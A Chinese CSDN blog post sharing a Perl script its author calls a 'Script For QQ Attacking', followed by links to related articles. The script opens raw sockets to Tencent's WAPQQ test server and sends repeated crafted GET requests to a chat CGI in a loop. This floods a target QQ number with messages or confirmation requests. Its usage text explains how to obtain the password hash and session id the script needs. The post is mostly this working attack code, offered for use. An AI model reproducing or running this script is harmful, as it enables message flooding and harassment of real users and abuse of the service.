一个简单的用Perl实现的Exploit实例

最新推荐文章于 2022-06-09 21:49:40 发布
最新推荐文章于 2022-06-09 21:49:40 发布
阅读量5.2k 收藏
点赞数
分类专栏: Security 文章标签: perl socket loops qq session 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/roylaw/article/details/287598
版权

以前在尝试攻击的时候改写的程序,现在贴出来可能会对一些朋友有些用处。
内容很简单,将外部参数引入,然后按照要求开启Socket会话,本例中访问的是HTTP。

#!/usr/bin/perl
#Coded By Roy<Roy at c4st.cn>
#Script For QQ Attacking

$|=1;
use Socket;
use Getopt::Std;
#获取外部参数
getopt('aytgkl');

print "/n             ===================================================/n";
print "                       Perl Script For QQ Attacking/n";
print "                          Coded By Roy<Roy at c4st.cn>     /n";
print "                       Visit:luoyi.com & c4st.cn              /n";
print "             ===================================================/n";

#参数不符合要求则显示使用方法
&usage unless ( defined($opt_a) && defined($opt_y) && defined($opt_t) && defined($opt_g) && defined($opt_k));

#将外部参数赋给内部变量
$mode=$opt_a;
$time=$opt_l||1;
$urqq=$opt_y;
$targ=$opt_t;
$pg=$opt_g;
$pk=$opt_k;

#定义了攻击中使用到的服务器,waptest.tencent.com是WAPQQ免费体验用的服务器
$host="waptest.tencent.com";
$port=80;

#采用"验证请求"方式攻击
if ($mode eq "c"){
print"Attacking ...";
for ($i=1;$i<=$time;$i++){
&attack2;
}
print"/nDone!.";
}
#采用"普通消息"方式攻击
elsif ($mode eq "n"){
print"Attacking ...";
for ($i=1;$i<=$time;$i++){
&attack1;
}
print"/nDone!.";
}
else
{&usage};

#"普通消息"方式攻击函数,被攻击者将收到类似"10001 Is Coming"的信息,如果要修改信息内容,请修改Psendmsg变量
sub attack1 {
$req = "GET /cgi-bin/wapqq_chat.cgi?Pc=11&Pq=$urqq&Pg=$pg&Poq=$targ&Pk=$pk&Psendmsg=$urqq%20Is%20Coming&PMisc_mid=123456789&stn=gmcc_try HTTP/1.1/n".
       "Accept: text/vnd.wap.wml, application/vnd.wap.wmlc, image/vnd.wap.wbmp, image/gif, image/jpeg, text/vnd.wap.wmlscript, application/vnd.wap.wmlscriptc/n".
       "User-Agent: C4ST(^-^)/n".
       "Host: waptest.tencent.com/n".
       "/n/n";
print "/n";
sendraw($req);
}

#"验证请求"方式攻击函数,被攻击者将收到类似"10001 Is Coming"的信息,如果要修改信息内容,请修改PConfirmInfo变量
sub attack2 {
$req = "GET /cgi-bin/wapqq_chat.cgi?Pc=27&Pq=$urqq&Pg=$pg&Poq=$targ&Pk=$pk&PConfirmInfo=$urqq%20Is%20Coming&PMisc_mid=123456789&stn=gmcc_try HTTP/1.1/n".
       "Accept: text/vnd.wap.wml, application/vnd.wap.wmlc, image/vnd.wap.wbmp, image/gif, image/jpeg, text/vnd.wap.wmlscript, application/vnd.wap.wmlscriptc/n".
       "User-Agent: C4ST(^-^)/n".
       "Host: waptest.tencent.com/n".
       "/n/n";
print "/n";
sendraw($req);
}

#显示使用方法的函数,PG和PK的值可以在登陆WAPQQ后查看源代码而得到
sub usage {
print qq~
Usage: $0 -a <Attack Mode> -l <Loops Of Attacking> -y <Your QQ Number> -t <Target To Attack> -pg <PG For Your WAPQQ> -pk <PK For Your Session>

    -a   =Attack Mode,Choose "n" For Normal QQ Msg Type,Or Choose "c" For Confirm QQ Msg Type
    -l   =Loops Of Attacking,The Times To Attack The Target
    -y   =Your QQ Number
    -t   =Target To Attack,QQ Number
    -g  =PG For Your WAPQQ(1)
    -k  =PK For Your Session(1)

(1)HowTo Get PG And PK:

PG is your QQ password's hash used in WAPQQ site.PK is the session id for your current visiting at WAPQQ site.You can get them once you logged on WAPQQ via your mobile,wap browser(eg.WinWAP) or wap2web service(eg.http://www.easywap.ch/Wap2Web.html).
~;
exit;
}

#Socket函数
sub sendraw {
    my ($req) = @_;
    my $target;
    $target = inet_aton($host) || die("inet_aton problems/n");
    socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) || die("Socket problems/n");
    if(connect(S,pack "SnA4x8",2,$port,$target)){
        select(S);
    $| = 1;
        print $req;
    close(S);
         return true;
    }
    else {
    die("Can't connect.../n");
    }
}

RoyLaw
关注
专栏目录
神奇的perl例子perl例子100个
08-19
神奇的perl例子,神奇的perl例子 perl例子100个,perl例子100个
【MSFconsole进阶】exploits(渗透攻击模块):Active Exploit(主动渗透攻击)、Passive Exploit(被动渗透攻击)
05-22 3852
【渗透工具】MSFconsole进阶:exploits(渗透攻击模块)
用python写exploit
weixin_33757911的博客
05-09 155
测试软件漏洞时,个人比较钟爱用python来完成exploit简单,快速。也见过不少用perl来写的,我不喜欢。随便记录一些常用的方法。 python中有个概念叫模块,模块中包含了定义的函数,方便重用。使用模块的语句如下: import 模块名 struct模块有个很方便的函数,pack,格式如下: struct.pack(format,参数) ...
perl入门的一个小例子
lksodit_yiyi的专栏
09-13 2549
今天看了perl书的第一章,感觉perl真是很丰富的语言,博大精深,要掌握的好,真不容易,不过好歹先看懂一个入门的这个小例子,我也是算是有一个好的开始,希望能透过对这门语言的学习,开启一个新的思路。 这个例子是从数据文件grades中读取信息,通过执行average.pl来计算出每个学生的平均成绩。 可以实际运行,没用过perl的可以玩一玩。 average.pl: #!/usr/bin/p
马尔可夫模型和隐马尔可夫_使用Perl的隐马尔可夫模型入门
cumo7370的博客
07-15 368
马尔可夫模型和隐马尔可夫 使用Markov模型(以数学家Andrey Markov的名字命名)用于随机变化系统的预测。 马尔可夫的见解是,在这种情况下,仅可以从事件的最新发生来做出良好的预测,而忽略当前事件之前的任何发生。 该方法可以描述为无记忆或与历史无关的预测。 马尔可夫的第一个例子(1913年)预言了普希金的诗作《尤金·奥涅金》中的元音出现。 今天的挑战是要找到一个研究领域,其中马尔可...
exploit-classifier:这是一个NLP模型,用于根据漏洞描述对漏洞进行分类
02-20
在这个项目中,exploit-classifier可能是通过训练一个深度学习或传统的机器学习算法来实现的,比如使用了支持向量机(SVM)、随机森林(Random Forest)、或者更现代的模型如BERT或Transformer。 NLP(自然语言处理...
Exploit_DB_Manager:简单的脚本下载漏洞
05-05
利用数据库管理器一个简单Perl脚本,用于在ExploitDb中查找,读取和下载漏洞利用程序。 他们可以选择: [+]查找并列出漏洞[+]具有给定ID的读取漏洞利用[+]下载具有给定ID的漏洞[+]下载特定名称的所有漏洞利用一段...
BungeeExploit_Exploit_minecraft源码_
10-02
在Minecraft的服务器管理中,BungeeCord是一个广受欢迎的插件,它允许玩家在多个服务器之间无缝切换,极大地提升了游戏体验。然而,如同任何复杂的软件系统一样,BungeeCord也有可能存在安全漏洞,这就是我们今天要...
SQLzr-i:这是一个Perl程序,可以执行自动SQL注入,以渗透测试WebSQL数据库保护。 法兹里·尼扎尔(M.Fazri Nizar)编码
02-05
SQLzr-i是一个由M.Fazri Nizar编写的Perl脚本,专为渗透测试Web应用程序的SQL数据库安全而设计。这个工具的核心功能是自动执行SQL注入攻击,以探测和利用潜在的SQL注入漏洞。在Web开发中,SQL注入是一种常见的安全...
Exploit-db漏洞库
Jim的博客
08-22 9116
访问的方法是在命令提示符中输入一下命令: cd /pentest/exploits/exploitdb/ cat files.csv | less BT5下的更新脚本 #!/bin/bash echo "Updating The Exploit-DB" cd /pentest/exploits/exploitdb/ wget http://www.expl
老哥,帮我看下这个 0day exploit:安全研究员遭疑似国家黑客社工,有人不幸中招...
smellycat000的专栏
01-26 659
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队谷歌威胁分析团队 (TAG) 花费几个月的时间发现了一起专门针对安全研究员的攻击活动。这些研究员在不同企业和组织机构从事漏洞...
记录一次perl木马脚本的处理
QQ群166477105Python技术群
02-27 818
top 看到服务器有两个ps命令占用cpu高 kill -9杀掉 然后找到异常的名称的进程 pwdx 24412 看看这个b在哪个目录 中间件老王: cd /tmp/.log_info 中间件老王: ll -a strings b 中间件老王: cd /tmp 中间件老王: 先把 50022Xab、b、f、i、p进程杀了 然后cd /tmp rm -rf .log_info 现在服务器恢复...
php 序列化漏洞,PHP反序列化漏洞成因及漏洞挖掘技巧与案例 | ADog's Blog
weixin_32909875的博客
03-20 507
最近在深入研究php的反序列化,觉得Test404这篇可能是同类当中写的最好的,不过不知道这篇出处是不是360的。。在这里转载一下以便新人学习~翻译:hac425一、序列化和反序列化序列化和反序列化的目的是使得程序间传输对象会更加方便。序列化是将对象转换为字符串以便存储传输的一种方式。而反序列化恰好就是序列化的逆过程,反序列化会将字符串转换为对象供程序使用。在PHP中序列化和反序列化对应的函数分别...
shell执行perl_技术干货 | CTF命令注入(代码执行漏洞)
weixin_42299427的博客
01-24 534
实验环境攻击机:172.20.10.5靶机:172.20.10.412实验流程端口扫描端口详细信息探测命令:nmap -T4 -A -v 靶机IP地址发现网站下的robots.txt中包含几个敏感目录web站点详细信息探测web目录爆破访问robots.txt,对其中的敏感目录进行查看其中/nothing为404页面,但是和正常的4014页面不同查看源代码,发现网站管理员在源代码中存储了...
Exploit编写教程2:跳转的多种姿势
周无争的博客
06-09 2029
在上节文章中,讲解了发现漏洞并构建有效 exploit 的基础知识。在使用的例子中, ESP 直接指向栈缓冲区的 Shellcode 开头,并且可以使用 语句来跳转到 Shellcode 。使用 是一个几乎完美的方法,但不是每次都那么容易。本节文章将讨论执行或跳转到 Shellcode 的其他方法,最后谈谈遇到较小的缓冲区如何应对。有以下方法可以执行 Shellcode :可能有多种方法跳转到 Shellcode ,也可能只有一种方法,也可能需要多种技术的组合。一个漏洞也很可能只会引发崩溃,不能利用。如
菜鸟编译exploit代码全攻略
weixin_34233679的博客
01-08 336
当网络安全捍卫者需要编译exploit代码时,这已经不是第一次了。每天发现针对Windows和Linux超过十多个的新exploit对我们来讲也不是罕见的,不幸的是,你不能够始终信任exploit的作者或者安全技术文章。 首先,许多exploits并不是广告。它们要么根本不起作用,要么仅在特定的时候起作用,要么仅在一个很小范围的机器中运行。你测试的exploit代码越多,你...
Exploit & Explore(探索与利用)
laolu1573的专栏
11-19 7496
Exploit &amp; Explore(探索与利用) 举个栗子 选餐厅: Exploitation : 去最喜欢的餐厅。 Exploration: 尝试新餐厅。 挖石油: Exploitation : 继续挖已有的。 Exploration: 去新地方挖。 在线广告: Exploitation : 展示最好的广告。 Exploration: 展示些不同的广告。 为什么 如果模型没...
Exploit编写教程1:栈溢出
周无争的博客
05-26 2237
Exploit编写教程1:栈溢出 要点提示: 复现环境首选 WinXP,因为没有 地址随机化ASLR,可以减少复现难度。ASLR在 Vista以上版本才有。 用到的工具有:python3\pwntools\windbg\x32dbg\msfvenom 造成崩溃后查看EIP是否为目标地址,使用 d esp 查看栈中的数据。 直接使EIP指向ESP不会有效果,要使EIP指向 jmp esp 指令的地址。 查看软件加载的DLL所在的地址范围,再使用 s 1a800000 l 1f200000 ff e4 查询该
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值